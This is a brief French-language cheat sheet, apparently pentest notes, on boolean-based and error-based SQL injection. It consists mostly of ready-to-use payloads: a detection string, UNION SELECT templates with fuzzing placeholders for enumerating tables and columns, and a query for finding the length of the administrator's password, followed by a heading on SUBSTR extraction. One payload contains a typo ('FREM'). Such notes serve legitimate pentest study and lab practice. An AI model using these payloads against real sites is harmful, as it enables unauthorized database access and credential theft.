🥽Boolean based / Error Based
Détection
'%20or'1'=='1
' or 1=1--Enumération des tables
' UNION SELECT 'a' FROM <FUZZtables> WHERE 1=1--
true pour table usersEnumeration des colonnes
' UNION SELECT 'a' FROM users WHERE <FUZZcolonnes>='administrator'--
true pour colonne usernameDeterminer le nombre de caractères dans le mot de passe d'un utilisateur
' AND (SELECT username FREM users WHERE username='administrator' AND LENGTH(password)=<FUZZ>)='administrator'--Exploitation avec SUBSTR / SUBSTRING

Mis à jour